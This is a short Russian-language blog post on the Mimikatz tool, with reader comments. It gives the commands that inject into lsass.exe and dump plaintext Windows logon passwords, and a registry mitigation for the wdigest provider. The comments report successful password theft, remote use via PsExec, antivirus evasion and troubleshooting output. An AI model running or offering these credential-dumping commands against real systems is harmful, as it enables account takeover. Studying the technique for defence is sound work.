Mimikatz — инструмент, реализующий функционал Windows Credentials Editor и позволяющий извлечь аутентификационные данные залогинившегося в системе пользователя в открытом виде.
Еще по теме: Повышение привилегий Windows
Атака реализуется следующей магией:
|
1 2 3 |
mimikatz # privilege::debug mimikatz # inject::process lsass.exe sekurlsa.dll mimikatz # @getLogonPasswords |
Подобное чудо связано с использованием поставщика безопасности wdigest, который с целью поддержки SSO хранит пароль в памяти открытым текстом (кто бы мог подумать!). Стоит ли говорить, какой выхлоп для атакующего представляет подобный недостаток :).
Защита от Mimikatz
Для защиты от атаки в качестве временного решения можно отключить поставщика безопасности wdigest через соответствующую ветвь реестра:
|
1 |
(HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa) |
Однако стоит понимать, что атакующий может проделать то же самое в обратном порядке.
Имейте ввиду, Mimikatz детектируется антивирусами как xак-тулза.
ПОЛЕЗНЫЕ ССЫЛКИ:
на win xp home у меня эта магия выдала ошибку и компьютер перезагрузился через минуту.
У меня запустилась, но чёт я не разобрался как с ней пользоваться.
Попробовал на Win 7 — магия отлично отработала — пароли учеток были получены. Ура!
Вопрос: работает ли mimikatz с командной строкой? Для ускорения процесса?
даа можно ещё и удалённо через PsExec
все равно не понял как сделать bat файл с этими 3-я командами.
Спасибо за Mimikatz!
на висте работает!!!Бооольшое спасибо!!!
На Windows XP SP2 сработала замечательно! Благодарствую!
А какие есть альтернативы данной программе?
В описании написано, что интерфейс на английском, в реальности это консольная программа, а сообщения на французком языке
Win7 и Win2008 отработала отлично. Ноды разных версий с актуальными базами не палят.
Все работает! Спасибо!
У меня не работает команда привилегии, подскажите как исправить
Здравствуйте, я столкнулся с проблемой в программе mimikatz. Она не показывает пароль. То есть просто чистая строка после «password:». Правда после неё идёт графа «kerberos», которой раньше не было, но и после неё ничего не пишет.
Вот что происходит:
1) Отключаю антивирус
2) Открываю mimikatz от имени администратора
3) privilege::debug (работает)
4) sekurlsa::logonpasswords full
Показывает много чего, но пароль — нет.
Я попытался перенести командой log в txt файл, но то же самое — вот скопированная строчка из того txt файла:
* Username : Admin
* Domain : HP4540S-F3R
* Password :
kerberos :